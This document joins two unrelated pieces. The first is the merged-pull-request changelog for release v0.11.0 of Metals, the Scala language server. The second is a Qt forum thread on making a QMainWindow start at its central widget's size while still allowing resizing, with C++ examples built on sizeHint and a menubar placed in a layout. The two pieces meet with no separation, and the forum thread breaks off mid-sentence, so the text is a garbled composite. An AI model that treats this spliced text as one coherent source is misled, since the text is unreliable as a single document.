Vadim Chelyshov Chris Kipp Arthur McGibbon Kamil Podsiadlo Gavin Ray Adrien Bestel Alexandre Archambault Lorenzo Gabriele Thomas Lopatic Merged PRs v0.11.0 (2022-01-12) Merged pull requests: - Update Bloop to 1.4.12 #3497 (tgodzik) - Fix issues with renames in Java files #3495 (tgodzik) - feat(doctor): add in explanations to the json doctor output #3494 (ckipp01) - Upgrade bloop to 1.4.11-51-ac1d788a #3492 (dos65) - Fixed compilation issue #3496 (tgodzik) - [Java] Support go-to-definition for *.javadependency sources #3470 (dos65) - Add edit distance for Java files #3480 (tgodzik) - Show more information in the doctor #3426 (tgodzik) - Add support for Scala 2.13.8 #3491 (tgodzik) - docs: update user config docs #3490 (ckipp01) - fix: override pprint in docs #3489 (ckipp01) - Don't show warnings for .metals/.tmp files #3488 (tgodzik) - Fix: Docusaurus Edit URL is broken #3487 (abestel) - parallelize source file indexing #3485 (Arthurm1) - Cache build targets #3481 (Arthurm1) - [Scala3] Fix autoimport with prefixes #3484 (dos65) - [Issue Template] Relax requirements #3474 (dos65) - [Build] add CommandSuite to TestGroups #3472 (dos65) - Add folding range for Java using Scanner #3468 (tgodzik) - cleanup: remove ./sbt from root of project #3471 (ckipp01) - docs: migrate gitter references to Discord #3469 (ckipp01) - refactor: refactor bug_report.md to be a yaml template #3467 (ckipp01) - Add tests for java go to implementation #3466 (tgodzik) - fix: use maybeOwner instead of owner when looking for shortened name #3465 (ckipp01) - [Scala 3] Fix insert type in case of type aliases #3460 (tgodzik) - fix: reuse main annotation logic from code lens in debug provider #3463 (ckipp01) - update: update millw and add script for it in the future #3457 (ckipp01) - Scala Steward - ignore org.eclipse updates #3453 (dos65) - Update flyway-core to 8.2.3 #3452 (scala-steward) - Update interface to 1.0.6 #3433 (scala-steward) - Update scribe, scribe-file, scribe-slf4j to 3.6.7 #3432 (scala-steward) - Update mill-contrib-testng to 0.10.0-M5 #3431 (scala-steward) - Update sbt-welcome to 0.2.2 #3429 (scala-steward) - Update jackson-databind to 2.13.1 #3428 (scala-steward) - Update bloop-config, bloop-launcher to 1.4.11-30-75fb3441 #3427 (scala-steward) - Fix analyze stacktrace when using toplevel methods #3425 (tgodzik) - [Scala 3] Fix issues when type cannot be inferred by the compiler #3423 (tgodzik) - refactor: take care of some deprecation warnings #3420 (ckipp01) - refactor: small build cleanups #3418 (ckipp01) - Fix issue with imports #3417 (tgodzik) - [Scalafmt] set proper dialect for sbt-metals #3416 (dos65) - docs: add file ids to the docs for new file commands #3415 (ckipp01) - Add run/debug code lense for Java main classes #3400 (tgodzik) - fix: ensure autoimports don't break scala-cli directives #3412 (ckipp01) - dep: update sbt to 1.6.1 #3413 (ckipp01) - [Mtags releases] Fails command if tag name doesn't match any pattern #3410 (dos65) - Detect missing src.zip in doctor #3401 (ayoub-benali) - Hardcode eclipse java formatter dependencies #3406 (Arthurm1) - Upgrade file-tree-views to 2.1.8. See #3379. #3405 (uncle-betty) - [Scalafmt] Fixes for automatic dialect rewrite #3394 (dos65) - Handle Java-only build targets #2520 (Arthurm1) - Use quick pick instead of message requests for debug discovery #3392 (tgodzik) - Add support for 3.1.1-RC2 #3391 (tgodzik) - Support sublime command links #3378 (ayoub-benali) - [UNTESTED] Fix Gradle detection, multimodule proj #3385 (GavinRay97) - Add Arthur to the team! #3389 (tgodzik) - [Actions] mtags-auto-release: specify github token #3390 (dos65) - Print more info about missing presentation compiler #3388 (kpodsiad) - Bump to sbt 1.6.0-RC2 #3384 (ckipp01) - Move to Scala 3 published artifacts where possible #3382 (ckipp01) - Enable to create file with just package #3375 (kpodsiad) - Use full range when using go-to definition for synthetics #3374 (tgodzik) - Fix quickpick #3353 (kpodsiad) - Update requests to 0.7.0 #3367 (scala-steward) - Update scalameta, semanticdb-scalac, ... to 4.4.31 #3372 (scala-steward) - Update flyway-core to 8.2.2 #3370 (scala-steward) - Update undertow-core to 2.2.14.Final #3369 (scala-steward) - Update ujson to 1.4.3 #3368 (scala-steward) - Update pprint to 0.7.1 #3366 (scala-steward) - Update geny to 0.7.0 #3365 (scala-steward) - Update bloop-config, bloop-launcher to 1.4.11-19-93ebe2c6 #3363 (scala-steward) - [Scala3] Fix ImportMissingSymbol code action #3362 (dos65) - Send Code lens refresh when supported by client #3355 (ayoub-benali) - Add go to definition via links to synthetic decorations #3360 (tgodzik) - [Build] Fix quick-publish-local #3361 (dos65) - Add information about source of exceptions #3340 (tgodzik) - Remove stray pprint #3357 (ckipp01) - Use Mill --importto import bloop when supported #3356 (lolgab) - Add test discovery endpoint #3277 (kpodsiad) - [Build] Add quick-publish-localcommand #3351 (dos65) - Actions - set jdk11 for mtags auto release #3348 (dos65) - Wrap quickpick and input box results into options #3344 (kpodsiad) - Cross tests - fix ignorance for test-mtags-dyn#3339 (dos65) - [Actions] Fixes for mtags-auto-release workflow #3337 (dos65) - Remove sublime version from the doc #3334 (ayoub-benali) - Fix issues with non-latest Scala versions #3332 (tgodzik) - Release process: publish mtagsfor the latest Metals release #3281 (dos65) - Improve the "(currently using)" message during bsp-switch. #3330 (ckipp01) - Adjust json trace docs #3279 (kpodsiad) - [Scala3] Fix go to defition for givens #3309 (dos65) - Update xnio-nio to 3.8.5.Final #3327 (scala-steward) - Bump coursier/setup-action from 1.1.1 to 1.1.2 #3329 (dependabot[bot]) - Update scalafix-interfaces to 0.9.33 #3328 (scala-steward) - Update flyway-core to 8.0.5 #3326 (scala-steward) - Update undertow-core to 2.2.13.Final #3325 (scala-steward) - Update geny to 0.6.11 #3324 (scala-steward) - Update sbt-scalafix, scalafix-interfaces to 0.9.33 #3322 (scala-steward) - [Scala3] Hover - improve tpe selection for signature and expression #3320 (dos65) - Move inactive maintainers to a separate list #3319 (tgodzik) - Remove unused stuff #3321 (alexarchambault) - Add option to run everything in the current file #3311 (tgodzik) - Add extract value code action #3297 (tgodzik) - Welcome Kamil to the team! #3317 (tgodzik) - Document support of find text in dependency command in sublime #3318 (ayoub-benali) - Better support for mill BSP #3308 (ckipp01) - Fix json rendering in documentation #3316 (ayoub-benali) - Add missing commands to client commands documentation #3315 (ayoub-benali) - Add isCommandInHtmlSupported to InitializationOptions doc #3314 (ayoub-benali) - Update sublime doc regarding Hover for selection #3313 (ayoub-benali) - Simplify usage of sbt server when no .bsp/sbt.json exists #3304 (ckipp01) - Support Scala3-NIGHTLY releases #3280 (dos65) - Document source file analyzer support in sublime #3310 (ayoub-benali) - ScalaVersion - discover new mtags version by coursier #3278 (dos65) - Update ammonite to 2.4.1 #3292 (tgodzik) - Fix expression for selection range in Ammonite #3303 (tgodzik) - [Scala 3] Add selection range #3276 (tgodzik) - Set rangeHoverProvider under experimental capabilities #3293 (ayoub-benali) - Update to latest millw 0.3.9 #3295 (ckipp01) - Update scalafix-interfaces to 0.9.32 #3291 (scala-steward) - Update sbt-scalafix, scalafix-interfaces to 0.9.32 #3287 (scala-steward) - Update mill-contrib-testng to 0.9.10 #3288 (scala-steward) - Update qdox to 2.0.1 #3289 (scala-steward) - Update flyway-core to 8.0.4 #3290 (scala-steward) - docs: update commands that now use TextDocumentPositionParams#3284 (ckipp01) - Update organize-imports rule with a fix for givens #3273 (tgodzik) - Add example about attaching debugger #3275 (tgodzik) - Add CFR class file viewer #3247 (Arthurm1) - Print Bloop logs when connection errored out #3274 (tgodzik) - Formatter: always specify global runner.dialect. #3259 (dos65) - Finer grained rules on build errors for debug discovery. #3271 (ckipp01) - RunDebugLens - fix stale lens #3270 (dos65) - [Docs] Align the info about endpoints and their parameters with latest release #3232 (dos65) - SuperMethodCodeLens - do not show stale lenses #3267 (dos65) - Take into account trace files in .metals directory #3103 (kpodsiad) - Fix issue with empty string in completions #3269 (tgodzik) - Update versions #3268 (tgodzik) - Add release notes for Metals v0.10.9 #3264 (tgodzik)
https://scalameta.org/metals/blog/2022/01/12/aluminium/
CC-MAIN-2022-21
refinedweb
2,976
53.61
I have a txt file containing over 200 tweets and im trying to calculate total scores for all the tweets in a particular region given their long/ lat.. a typical tweet looks like: [30.346168930000001, -97.73518] 0 2011-08-29 04:54:22 Best vacation of my life #byfar Happy: 1 Sad, 5: with open('words.txt') as f: sentiments = {word: int(value) for word, value in (line.split(",") for line in f)} with open('sentences.txt') as f: for line in f: values = Counter(word for word in line.split() if word in sentiments) if not values: continue) class Region: def __init__(self, lat_tuple, long_tuple): self.lat_tuple = lat_tuple self.long_tuple = long_tuple def contains(self, lat, long): return self.lat_tuple[0] <= lat and lat < self.lat_tuple[1] and\ self.long_tuple[0] <= long and long < self.long_tuple[1] eastern = Region((24.660845, 49.189787), (-87.518395, -67.444574)) central = Region((24.660845, 49.189787), (-101.998892, -87.518395)) mountain = Region((24.660845, 49.189787), (-115.236428, -101.998892)) pacific = Region((24.660845, 49.189787), (-125.242264, -115.236428)) I didn't check you're coordinates completely, but you seem to be on the right track. Using what you did, all I would need to do to parse the tweet file: scores = {'eastern':0,'central':0,'pacific':0,'mountain':0} for line in open('tweets.txt'): line = line.split(" ") lat = float(line[0][1:-1]) #Stripping the [ and the , long = float(line[1][:-1]) #Stripping the ] if eastern.contains(lat,long): scores['eastern'] += score(line) #Assuming you have a score function elif central.contains(lat,long): scores['central'] += score(line) elif mountain.contains(lat,long): scores['mountain'] += score(line) elif pacific.contains(lat,long): scores['pacific'] += score(line) else: raise ValueError("Could not locate coordinates "+line[0]+line[1]) You could make this more elegant by wrapping the if statements in a function: def region(lat,long): #DEFINE HERE YOUR REGIONS, IN THE Function, or leave them as globals if eastern.contains(lat,long): return 'eastern' if central.contains(lat,long): return 'central' if mountain.contains(lat,long): return 'mountain' if pacific.contains(lat,long): return 'pacific' raise ValueError(" ".join(("could not locate coordinates",str(lat),str(long)))) Than the if statements in the loop are gone: scores[region(lat,long)] += score(line) EDIT: you need to define score to be a function that accepts a tweet, or the split line in my above code(which is a list of words, including the coordinate): def score(tweet): total = 0 for word in tweet: if word in sentiments: total += 1 return total/(len(tweet)-2) #Subtract the coordinates from the length) Assuming the global sentiments is defined beforehand.
https://codedump.io/share/EeNvQz7FFNZr/1/adding-scores-of-sentences-depending-on-region-python-very-lost
CC-MAIN-2016-50
refinedweb
446
51.55
Answered by: get numa node from pointer adress - Is there a way to learn on which NUMA node a memory block resides? I have an application where large blocks of memory that are externally allocated need to be processed by multiple threads in parallel. I would like something like: GetNumaNodeNumber( __in LPVOID ptr, __out PULONG NodeNumber ); Question Answers - All replies - I might have missed something here, but I don't know of anything. I will definitely ask and see if I have missed something, but there doesn't appear to be an equivalent to VirtualAllocNumaEx which lets you query the NUMA node from an address. Windows Server 2008 R2 did extend the NUMA API set and there is a good overview here: Are you hitting measurable performance issues as a result of this and if I may ask what is the rough HW config you're looking at here. Thanks, Rick Rick Molloy Parallel Computing Platform : - Marked as answer by rickmolloy Friday, September 18, 2009 4:14 PM - Unmarked as answer by mattijsdegroot Friday, December 04, 2009 9:27 AM - Thanks a lot for your input and sorry for not responding sooner. Forgot to check on any replies while I was busy with some other things. To be honest I am not sure at this point if I am hitting perfomance issues since I have no way of knowing if the data resides on the node processing it or not. I have a camera that spits out frames of data at a high rate (c.a. 500 MBytes/s). These frames need to be processed and I would like to do the processing on the node where the data resides. Since I have no control over the memory allocation for the camera buffers I would like to check on which node they reside. Even if there is no API function that does this is there a way to determine it based on the pointer adress? Is the first half of the adress space allocated to Node 0 and the second half to Node 1 perhaps? My hardware is the following: - HP Proliant ML370 G6 - 2x Intel Xeon E5540 - 8GB memory All comments are highly appreciated, Mattijs - - Thanks for the information. I'll have a look at that code. Do you agree that it would be reasonable to expect such a function in the API? It would seem to me that having to deal with externally allocated memory is a fairly general problem in NUMA aware applications. Mattijs - I, personally, can see no reason why such information should be withheld or not presented via the API if the information is already available to the Operating System itself (Full system topology info is a related case in point that IMO should always have been available since even before dual processor machines first emerged, Win7 at least addresses that lack now). There may even be some undocumented API that publishes the "memory@node" location that the other APIs use, buried someplace that could be exposed as part of the NUMA API ? - As you stated above, the information is indeed available. If I interpret the code for The Numa Explorer correctly it is possible to get the information through the process status API (PSAPI), but that is a very cumbersome process. Where could I file such an API feature request? - Indeed QueryWorkingSetEx is the way to go for now. I got the following response from microsoft after sending an API request: QueryWorkingSetEx can be used for this. There is an example here: Note that physical pages in a given virtual buffer are not necessarily allocated from the same NUMA node. In most cases, checking only the first page in the buffer should work, but there might be situations where the first page is allocated from node X and the rest of the pages are from node Y (even if all nodes in the system have plenty of available pages). This could happen for example if the contents of first page are initialized by one thread, and the rest of the pages are initialized from a different thread whose ideal processor is part of a different node. If they don't control how the buffer is allocated and initialized it might make sense to check several pages at random and select the node that appears most often. ======== The example at the above link is "Allocating Memory from a NUMA Node." See the DumpNumaNodeInfo function for the QueryWorkingSetEx call. I will pass your API request on to the NUMA product team; they are currently in the planning stage for the next version of Windows. But in the meantime, I hope QueryWorkingSetEx works for your application so you don't have to wait. :-) - Proposed as answer by Mohamed Ameen Ibrahim Friday, August 06, 2010 5:15 PM - After a long delay I revisited this problem and I have come up with the code listed below to directly determine the NUMA Node from a pointer. It was actually much easier than I thought. It seems to work correctly, but beware that the pointer needs to point to initialized memory. If you like this function or have suggestions to improve it I would love to see a reply. Mattijs #define _WIN32_WINNT 0x0600 #include <windows.h> #include <psapi.h> int GetNumaNodeFromAdress (PVOID Buffer) { //PCHAR StartPtr = (PCHAR)(Buffer); PSAPI_WORKING_SET_EX_INFORMATION WsInfo; WsInfo.VirtualAddress = Buffer; BOOL bResult = QueryWorkingSetEx( GetCurrentProcess(), &WsInfo, sizeof(PSAPI_WORKING_SET_EX_INFORMATION) ); if (!bResult) return -2; PCHAR Address = (PCHAR)WsInfo.VirtualAddress; BOOL IsValid = WsInfo.VirtualAttributes.Valid; DWORD Node = WsInfo.VirtualAttributes.Node; if (IsValid) return Node; else return -1; }
https://social.msdn.microsoft.com/Forums/vstudio/en-US/37a02e17-e160-48d9-8625-871ff6b21f72/get-numa-node-from-pointer-adress?forum=parallelcppnative
CC-MAIN-2016-22
refinedweb
925
59.13
24 June 2008 20:41 [Source: ICIS news] HOUSTON (ICIS news)--Yara has purchased 12,500 tonnes of ammonia for the US Gulf from Potash Corporation of Saskatschewan (PotashCorp) at $585/tonne (€374/tonne), a source close to the transaction said on Tuesday. The price is a jump for spot US Gulf CFR (cost and freight) ammonia, which was trading at around $515-517/tonne in the week ended 19 June, according to global chemical market intelligence service ICIS pricing. The shipment is to load in Yuzhny during the first half of July on the Sombeke and arrive in ?xml:namespace> The more than 13% price increase comes at a time when the global food crisis has placed a premium on fertilizer chemicals. Further complicating matters is the flooding in the US cornbelt, which has decimated many of the country’s crops and will likely lead to more aggressive planting next season, in turn increasing demand for ammonia. ($1 = €0.64) To discuss issues facing the chemical industry go to ICIS connect
http://www.icis.com/Articles/2008/06/24/9135131/us-gulf-ammonia-increases-to-585tonne.html
CC-MAIN-2015-06
refinedweb
172
52.53
11 December 2007 21:00 [Source: ICIS news] By Nigel Davis LONDON (ICIS news)--Chemical companies have been on a roll in 2007. Industry output is reckoned to have grown by 4.1% compared with 4.5% in 2006 and 4.0% in 2005. US growth has slowed but ?xml:namespace> Against the backdrop of an economic slowdown, however, the industry faces tougher times. “Worldwide expectations for the coming months are rather negative and reflect the high uncertainty for businesses,” the European chemicals trade federation Cefic said in its monthly economics report issued on Tuesday. We are in the tricky position where the global perception of the economic situation has worsened, for some, considerably, but remains above its long-term average. Upstream in petrochemicals the fourth quarter is unlikely to prove to be good. Volumes have remained relatively buoyant but margins have been under pressure from higher energy and feedstock costs. Price increases have been hard won. The ACC noted last week in its year-end report and outlook that chemical industry activity had moderated in 2007 paralleling the trend in broader industry. Leading indicators of global industrial production continue to suggest that the growth cycle had peaked, it said. Chemical output growth in the Bulk petrochemicals and organics output growth in 2007, based on data for the first 10 months of the year, is put at 4.3% with plastics growth at 1.9%. These segments have been lifted by still relatively high domestic demand – including recovery in the automobile sector – and a considerable boost from exports. The lift to the industry from trade this year cannot be ignored. Plastics exports have risen between 10-20% in the year-to-date, consultants say. The The slowdown in manufacturing coming from light vehicles and the housing-related industries produced a downstream inventory correction during 2007. By the third quarter, however, demand and supply were back in balance and the industry posted strengthening year-earlier comparisons, the ACC says. But the sector faces economic headwinds. ACC chief economist, Kevin Swift, usually develops three growth scenarios for the industry to consider at this time of year. Strong growth – the brightest scenario – was virtually unthinkable in 2008, he said. There was a 55% chance that the economy would traverse a rocky road to a level of growth hit by the sub-prime mortgage fallout and housing downturn. In the worst case, he said there was a 45% chance of recession. Swift notes that jobs are still being created in the The threat of recession is real but he is not one who believes that recession hit in November. However, if non-farm payroll gains are not greater than 75,000 a month for three months in a row he contends that the downturn will have hit. What of chemicals growth prospects then? The question arises then of the impact of much slower The upstream chemical industry, particularly, thrives when To sustain 4% annual vverage output growth the sector needs
http://www.icis.com/Articles/2007/12/11/9085942/insight-factoring-in-growth-in-tricky-times.html
CC-MAIN-2014-52
refinedweb
496
55.34
Event Streaming Using Spring WebFlux Event Streaming Using Spring WebFlux In Spring Framework 5, a new module was released for supporting reactive applications called WebFlux. Check out this post to learn more. Join the DZone community and get the full member experience.Join For Free FlexNet Code Aware, a free scan tool for developers. Scan Java, NuGet, and NPM packages for open source security and open source license compliance issues. Overview Spring Framework 5 includes a new WebFlux module for supporting reactive applications. If we want systems that are responsive, resilient, elastic, and message-driven, then we need to introduce “reactive systems.” It was created to solve the problem of the need for a non-blocking web stack to handle concurrency with a small number of threads. The term “reactive” refers to programming models that are built around reacting to change. In this regard, non-blocking is reactive, because, instead of being blocked, we are now in the mode of reacting to notifications as operations complete or data becomes available. It is fully non-blocking and supports reactive streams back pressure, running on servers such as Netty, Undertow, and Servlet 3.1+ containers. . Nodejs is able to serve thousands of requests with only one thread! Data Types Spring uses behind the scenes Reactor () as the library to structure their new APIs. Flux and Mono are the two main concepts involved in reactive programming. Both are implementations of Publisher interface, but Flux produces 0 to N items, while Mono produces 0 to 1 item. The Sample System For testing purposes, let's suppose that we need to create a service that continuously monitors the temperature of an object (in Celsius), in an IoT-style manner: Preparations We’ll set up the following dependency: <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-webflux</artifactId> </dependency> Server Part Now, let’s start to create the controller responsible for generating temperatures: import java.time.Duration; import java.util.Random; import java.util.stream.Stream; import org.springframework.http.MediaType;)); } } The server part consists of a RestController that has a route responding to the /temperatures path using GET HTTP method. Flux is the reactive component that we use to send multiple objects to the client. We can create this in many different ways, but, for this simple scenario, we used the generation starting from a Java 8 stream. The delayElementsmethod is used to insert a delay for every item sent to the client..http.MediaType; the connection with the server part. Once we have a specified URL and media type accepted by the client, we can retrieve the flux and subscribe to each event sent on it, in this case, printing each element on the console. Conclusions In this article, we have seen how to produce and consume a stream of data in a reactive way using the new Spring WebFlux module. All of the code snippets that were mentioned in the article can be found in my Github repository. Scan Java, NuGet, and NPM packages for open source security and license compliance issues. Published at DZone with permission of Marco Giglione , DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/event-streaming-using-spring-webflux?fromrel=true
CC-MAIN-2018-43
refinedweb
546
55.34
Let’s say you are writing software that handles monetary transactions. If you used Python’s built-in floating-point arithmetic to calculate a sum, it would result in a weirdly formatted number. cost_of_gum = 0.10 cost_of_gumdrop = 0.35 cost_of_transaction = cost_of_gum + cost_of_gumdrop # Returns 0.44999999999999996 Being familiar with rounding errors in floating-point arithmetic you want to use a data type that performs decimal arithmetic more accurately. You could do the following: from decimal import Decimal cost_of_gum = Decimal('0.10') cost_of_gumdrop = Decimal('0.35') cost_of_transaction = cost_of_gum + cost_of_gumdrop # Returns 0.45 instead of 0.44999999999999996 Above, we use the decimal module’s Decimal data type to add 0.10 with 0.35. Since we used the Decimal type the arithmetic acts much more as expected. Usually, modules will provide functions or data types that we can then use to solve a general problem, allowing us more time to focus on the software that we are building to solve a more specific problem. Ready, set, fix some floating point math by using decimals! Instructions Run your code to see the weird floating point math that occurs. In script.py import Decimal from the decimal module. Use Decimal to make two_decimal_points only have two decimals points and four_decimal_points to only have four decimal points.
https://production.codecademy.com/courses/learn-python-3/lessons/modules-python/exercises/modules-python-decimals
CC-MAIN-2021-04
refinedweb
211
59.9
This is for my AP Computer Science class that I am struggling with. Please help me. Assignment Purpose: The primary purpose of this lab is to demonstrate knowledge of creating a class with object methods, instantiate multiple objects of the created class, and then call the object methods from the main program method. 0. This program will utilize GUI input and output windows. For this assignment you are not expected to create this GUI code yourself. Your main concern is to create and use the Rational class. The Rational class is quite involved and will be developed over two separate assignments. This first assignment will just get the ball rolling. The main method is provided for you and needs to be used as shown. You are also provided with a getGCF method of the Rational class which will return the Greatest Common Factor of 2 integers. You will find this useful in writing other methods of the Rational class. Your mission is to complete the Rational class that is used by the Lab08MATH02java program. Here is the Code that they give you; Code : // MathLab02st.java // The Rational Class Program I // This is the student, starting version of the MathLab02 assignment. import javax.swing.JOptionPane; public class Lab08MATH02st {Num()+"/"+r.getDen()+" equals "+r.getDecimal()); System.exit(0); } } class Rational { // Rational // getNum // getDen // getDecimal // getRational // getOriginal // reduce private int getGCF(int n1,int n2) { int rem = 0; int gcf = 0; do { rem = n1 % n2; if (rem == 0) gcf = n2; else { n1 = n2; n2 = rem; } } while (rem != 0); return gcf; } } 80 Point Version SpecificsNum, getDen and getDecimal. Method getNum returns the integer numerator, getDen returns the integer denominator and the getDecimal method returns a real number decimal value of the fraction. For example, if the numerator is 3 and the denominator is 4, getDecimal will return 0.75 80 (and 90) Point Version Output 1 The GUI windows appear one after the other. They do not all show up simultaneously as shown below. The windows will display on top of the current desktop and they are smaller than the windows shown for this sample execution. 80 (and 90) Point Version Output 2 90 Point Version Specifics The 90-point version adds the getRational method. This method returns a String representation of the fraction. For example, if the numerator is 3 and the denominator is 4, getRational will return 3/4 Concatenation Hint: You probably know that String variables/values can be concatenated together. Example: "John" + "Smith" = "JohnSmith" What you may not know is that other data types can be concatenated with Strings as well. Example: "John" + 19 = "John19" This shows an int being concatenated to the end of a String. Even though the output of the 90 point version is identical to the 80 point version (see previous page), the showMessageDialog statement will need to be changed in the main method for the 90 point version to work properly. (See below.) Now a single call to getRational replaces the 2 calls to methods getNum and getDen. 90 Point Version Code :Rational() + " equals " + r.getDecimal()); System.exit(0); } 100 Point Version Specifics The 100-point version adds the getOriginal and reduce methods as well as firstNum and firstDen variable attributes. The constructor also needs to be changed. This version of the lab assignment reduces the fraction, if possible. The output displays something like 15/20 reduces to 3/4. Without additional variables, the original values of the numerator and denominator will be lost. You need to achieve the following sequence. The Rational constructor initializes all variables and then reduces the fraction. The reduce method needs getGCF to insure maximum reduction. As with the 90 point version, the showMessageDialog statement will need to be changed in the main method for this program to work properly. (See below.) Code : public static void main (String args[]) { String strNbr1 = JOptionPane.showInputDialog("Enter Numerator 1"); String strNbr2 = JOptionPane.showInputDialog("Enter Denominator 2"); int num = Integer.parseInt(strNbr1); int den = Integer.parseInt(strNbr2); Rational r = new Rational(num,den); JOptionPane.showMessageDialog(null,r.getOriginal() + " equals " + r.getDecimal() + "\n and reduces to " + r.getRational()); System.exit(0); } Attachment 797 Here si the original Word Doc that describes the lab. Here I the Java file I am provided with.Attachment 798 If you can help me figure this out I would be most appreciative.
http://www.javaprogrammingforums.com/%20object-oriented-programming/11694-rational-class-program-%5Bhomework-help%5D-printingthethread.html
CC-MAIN-2016-36
refinedweb
722
57.57
In the desktop designer we would always use the tw.object namespace to initialize a complex variable. (See). In the web designer, the tw.object namespace does not exist. We have found several workarounds using default values in the Variables tab, but this approach is limited. How do we properly initialize these variables on the fly within our BPM process? Answer by Brandon Dickey (875) | Aug 29, 2017 at 12:57 PM In Web Process Designer, the tw.object namespace should still exist in Web PD. That page you highlighted is still applicable in the BPM 8.5.7 Web Process Designer: Where are you seeing the issue with using the tw.object namespace? I believe Client Side Human Services may not be able to use that name space, but Heritage Human Services would be able to use it in that case. 141 people are following this question. How best to deal with environment variables 4 Answers If I set a variable 'Is list' and set it 'has default' in PD of BPM, how can I add new item into the list ? 1 Answer business object namespace and prefix 1 Answer How can I choose 10 different independent variables in a logistic regression? 0 Answers BPM Variable for Assign & Update 1 Answer
https://developer.ibm.com/answers/questions/397128/initialize-variables-in-the-bpm-web-designer.html?smartspace=bpm
CC-MAIN-2019-22
refinedweb
212
74.49
The following compile errors were returned when building mstore: mstore.c: In function `read_event': mstore.c:423: warning: passing arg 2 of `ical_preprocess' from incompatible pointer type mstore.c: In function `write_event': mstore.c:457: warning: unsigned int format, long unsigned int arg (arg 3) This I believe is due to the value of size_t on OS X is not an int, but an unsigned long, which also calls for some conversion before passing to standard library formatting functions as well. Similar errors occur when compiling icap: icaproutines.c: In function `icap_literal': icaproutines.c:167: warning: unsigned int format, long unsigned int arg (arg 3) Modifications required for building: 1. In mstore.c, #include "crypt.h" is required to be commented out, as this is a part of "unistd.h" in OS X. 2. In Makefile for libmcal, the "-shared" flag needs to be replaced by "-bundle -flat_namespace -undefined suppress"
https://sourceforge.net/p/libmcal/bugs/26/
CC-MAIN-2018-05
refinedweb
150
68.26
Getting QMainWindow to fit its central widget This question was already asked in various forms, but I cannot find a solution to my particular case. I am trying to create a QWidget top window that has an initial size and is resizable. The complication comes from these two facts : - The widget needs a menu bar - The widget cannot have a layout, because parts of it are painted, so its children need to be positioned by absolute x-y coordinates. To solve the first point, I have embedded the widget in the center of a QMainWindow, but am now incapable of making the QMainWindow honor the initial size requirement. I would like to avoid calculating an initial size for the QMainWindow, because I'm not sure how portable will these calculations be. Setting the central widget to a fixed size solves the initial size problem, but then the QMainWindow can no longer be resized. Setting a minimum size also solves it, but then it cannot be resized below that size. After a few hours of wrestling with the problem and trying various combinations, can someone help whose understanding exceeds mine as regarding size policies in this case ? hi Im not 100% sure about "making the QMainWindow honor the initial size requirement" Normally it would be the other way around. Making the widget follow size of mainwindow. So im not sure why you cannot add a layout to mainwindow and add a widget to that. so it follow mainwindow then in this widget u can use paintevent for drawing and also direct x,y pos since it has no layout inside. like this: the green widget would be your own widget doing drawing. Thanks for answering and for the example. I know that QMainWindow has a layout and that is not my problem. The problem is that it resizes the widget. It is the widget that has no layout (or I wouldn't need QMainWindow). I would like the widget to start with a size that is determined when creating it - it is not always the same size like in your example, and the painted part is not identical for all invocations. I am forced to embed it in a QMainWindow, because otherwise having a menu is too complicated. But I wish the widget to start initially with a size that is determined at the time of its creation and force the QMainWindow to give the widget that exact size. For future resizes by the user, enlarging or reducing, the QMainWindow may do its stuff in the normal way. - mrjj Qt Champions 2016 but its still not clear to me why you cannot let the widget follow mainwindow and then just set mainwindow to size that allow the size of the widget you want? If u set ui->IMSELFPAINTED->setMinimumSize(800,600); i get green area of that size. and mainwindow somewhat bigger. You cannot do like that? then later, maybe in showevent, call ui->IMSELFPAINTED->setMinimumSize(0,0); to allow any resize. I currently do use setMinimumSize as a stop-gap measure while developing. The setMinimumSize(0,0) solution is certainly much simpler than all my monkeying with size policies. Question: Is showEvent for the central widget safe enough, I mean is it done after all size adjustments were already set (at least until some future resize) ? @Harry123 well it would be showEvent for mainwindow. Normally its safe yes. All sizes set and layouts resolved. @Harry123 Good luck. Note. I just added layout to mainwindow and then a widget. ( the green one) So its not directly on centralwidget. - Chris Kawa Moderators You don't need all this toying around. The default size policy is QSizePolicy::Preferred, which means it uses size hint of the widget when it is shown. As for the menu bar - the easiest way is add it to the layout. You don't have to use that layout for any other children. It can be there just for the menu bar and you can place other children manually. Here's a demo: #include <QApplication> #include <QPushButton> #include <QMenuBar> #include <QVBoxLayout> struct Foo : public QWidget { QSize sizeHint() const override { return QSize(400,400); } }; int main(int argc, char *argv[]) { QApplication a(argc, argv); Foo foo; foo.setLayout(new QVBoxLayout()); //use a layout for menu bar foo.layout()->setMenuBar(new QMenuBar()); foo.layout()->menuBar()->addAction(new QAction("Hi!", &foo)); QPushButton* p = new QPushButton(&foo); //don't use layout, place it manually p->move(100,100); foo.show(); return a.exec(); } If you really don't want the layout for some reason here's the version with main window wrapper, but it's not really necessary: #include <QApplication> #include <QPushButton> #include <QMenuBar> struct Foo : public QWidget { QSize sizeHint() const override { return QSize(400,400); } }; int main(int argc, char *argv[]) { QApplication a(argc, argv); QMainWindow w; w.setMenuBar(new QMenuBar()); //use the built-in layout for menu bar w.menuBar()->addAction("Hi!"); w.setCentralWidget(new Foo); //place the widget in built-in layout QPushButton* p = new QPushButton(w.centralWidget()); //place the child manually p->move(100,100); w.show(); return a.exec(); } I tested and this works, but there is a problem with the menubar now obscuring the upper part of the widget. First, this would require modifying all paint functions using absolute coordinates to add a vertical offset equal to the height of the menubar, which is not a simple a job. Second, it requires manually increasing the height of the widget. These entail the kind of assumptions on my part regarding the GUI which I try to avoid. I prefer to let Qt do this kind of calculations, for portability. - Chris Kawa Moderators Ok then, you can use the second variant. QMainWindow will do the calculations for you, but... First, this would require modifying all paint functions (...) which is not a simple a job. Actually it's a one-liner: void Widget:: paintEvent(QPaintEvent* evt) { QPainter p(this); p.setTransform(QTransform::fromTranslate(0, layout()->menuBar()->height())); //paint as usual } Second, it requires manually increasing the height of the widget. These entail the kind of assumptions on my part regarding the GUI which I try to avoid. No assumptions needed: QSize sizeHint() const override { return QSize(400, 400 + layout()->menuBar()->height()); } If you're extra paranoid you can also check layout and menubar for nullpointers, but that's not really necessary here. I'm learning a lot from your answers, but regarding "No assumptions needed", there is one big assumption here - that the menubar is part of the widget and is displayed on top. I never programmed on the Mac or Android, but I'm not too sure that this assumption will hold there or on all other platforms where Qt was or will be ported. - Chris Kawa Moderators there is one big assumption here Right. I'm not an expert on other platforms either. I think the menu can indeed not be a part of the window at least on Mac. Ok then. The wrapper option should still be valid in these scenarios. You solution works, and works beautifully. And what's more, is 